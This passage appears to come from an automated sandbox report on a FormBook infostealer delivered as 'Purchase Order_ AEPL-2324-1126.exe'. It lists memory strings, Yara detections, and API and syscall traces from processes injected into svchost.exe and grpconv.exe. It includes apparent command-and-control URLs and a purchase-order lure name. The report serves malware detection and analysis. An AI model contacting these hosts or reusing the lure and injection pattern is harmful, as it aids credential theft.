            Source: grpconv.exe, 00000005.00000002.3859947867.00000000027CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: grpconv.exe, 00000005.00000002.3859947867.00000000027CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: grpconv.exe, 00000005.00000002.3859947867.00000000027B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: grpconv.exe, 00000005.00000002.3859947867.00000000027CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: grpconv.exe, 00000005.00000002.3859947867.00000000027B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: grpconv.exe, 00000005.00000003.1815230743.00000000074CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: grpconv.exe, 00000005.00000002.3870343838.0000000005BC4000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.0000000003CE4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.deefbank.net/i06p/?76=Vpg7jNNJFscOYvB4AFVvnCABD6vaG9WwQKsmOhPgVM6zGb6O3kTWptBkzi24RSKPCb
            Source: grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: grpconv.exe, 00000005.00000002.3870343838.0000000005EE8000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.0000000004008000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: grpconv.exe, 00000005.00000003.1820031879.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: grpconv.exe, 00000005.00000002.3870343838.00000000053EA000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3868956155.000000000350A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.rtpngk.xyz/yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,742845F0,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,6FE0CB00,6FE0C2F0,SetCapture,ClientToScreen,6FE0C530,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,742845F0,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Purchase Order_ AEPL-2324-1126.exe
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0046A07E PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0046A07E
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004710F1 NtdllDialogWndProc_W,6FE0C580,6FE0C6F0,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_004710F1
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0045034C GetParent,NtdllDialogWndProc_W,0_2_0045034C
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044036A NtdllDialogWndProc_W,0_2_0044036A
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00440306 NtdllDialogWndProc_W,0_2_00440306
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0047132F NtdllDialogWndProc_W,0_2_0047132F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00440338 NtdllDialogWndProc_W,0_2_00440338
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0046A38E NtdllDialogWndProc_W,NtdllDialogWndProc_W,0_2_0046A38E
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0045039B GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W,0_2_0045039B
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004404E8 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_004404E8
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044048E NtdllDialogWndProc_W,0_2_0044048E
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044786A NtdllDialogWndProc_W,0_2_0044786A
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0047C81C SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,742845F0,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,6FE0CB00,6FE0C2F0,SetCapture,ClientToScreen,6FE0C530,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,742845F0,0_2_0047C81C
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004478AC GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx,0_2_004478AC
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004479A0 GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W,0_2_004479A0
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004629B7 NtdllDialogWndProc_W,NtdllDialogWndProc_W,0_2_004629B7
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0047EA6F NtdllDialogWndProc_W,0_2_0047EA6F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00447ABC SendMessageW,NtdllDialogWndProc_W,0_2_00447ABC
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00447B4E NtdllDialogWndProc_W,0_2_00447B4E
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00454CFC NtdllDialogWndProc_W,0_2_00454CFC
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00454D4A NtdllDialogWndProc_W,0_2_00454D4A
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0042FDA6 ClientToScreen,6FE0C5D0,NtdllDialogWndProc_W,0_2_0042FDA6
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0042FE05 742845F0,NtdllDialogWndProc_W,0_2_0042FE05
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00470E96 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00470E96
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C593 NtClose,2_2_0042C593
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,2_2_03772C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04594650 NtSuspendThread,LdrInitializeThunk,5_2_04594650
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04594340 NtSetContextThread,LdrInitializeThunk,5_2_04594340
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04592C70
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592C60 NtCreateKey,LdrInitializeThunk,5_2_04592C60
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04592CA0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04592D10
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04592D30
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592DD0 NtDelayExecution,LdrInitializeThunk,5_2_04592DD0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04592DF0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04592EE0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_04592E80
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592F30 NtCreateSection,LdrInitializeThunk,5_2_04592F30
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592FE0 NtCreateFile,LdrInitializeThunk,5_2_04592FE0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592FB0 NtResumeThread,LdrInitializeThunk,5_2_04592FB0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592AD0 NtReadFile,LdrInitializeThunk,5_2_04592AD0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592AF0 NtWriteFile,LdrInitializeThunk,5_2_04592AF0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592B60 NtClose,LdrInitializeThunk,5_2_04592B60
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04592BF0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04592BE0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04592BA0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045935C0 NtCreateMutant,LdrInitializeThunk,5_2_045935C0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_045939B0 NtGetContextThread,LdrInitializeThunk,5_2_045939B0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592C00 NtQueryInformationProcess,5_2_04592C00
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592CC0 NtQueryVirtualMemory,5_2_04592CC0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592CF0 NtOpenProcess,5_2_04592CF0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592D00 NtSetInformationFile,5_2_04592D00
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592DB0 NtEnumerateKey,5_2_04592DB0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592E30 NtWriteVirtualMemory,5_2_04592E30
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592EA0 NtAdjustPrivilegesToken,5_2_04592EA0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592F60 NtCreateProcessEx,5_2_04592F60
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592F90 NtProtectVirtualMemory,5_2_04592F90
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592FA0 NtQuerySection,5_2_04592FA0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592AB0 NtWaitForSingleObject,5_2_04592AB0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04592B80 NtQueryInformationFile,5_2_04592B80
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04593010 NtOpenDirectoryObject,5_2_04593010
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04593090 NtSetValueKey,5_2_04593090
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04593D70 NtOpenThread,5_2_04593D70
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_04593D10 NtOpenProcessToken,5_2_04593D10
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002F90F0 NtCreateFile,5_2_002F90F0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002F9260 NtReadFile,5_2_002F9260
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002F9350 NtDeleteFile,5_2_002F9350
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002F93F0 NtClose,5_2_002F93F0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002F9550 NtAllocateVirtualMemory,5_2_002F9550
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,74FD5590,74FD7ED0,CreateProcessAsUserW,74FD5030,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,74FD7F30,0_2_00446313
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_040036900_2_04003690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185332_2_00418533
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010C02_2_004010C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012702_2_00401270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402AF72_2_00402AF7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023732_2_00402373
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B002_2_00402B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B292_2_00402B29
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EBA32_2_0042EBA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024E22_2_004024E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024F02_2_004024F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FD512_2_0040FD51
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FD532_2_0040FD53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF732_2_0040FF73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041670F2_2_0041670F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167132_2_00416713
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F262_2_00402F26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F302_2_00402F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DFF32_2_0040DFF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
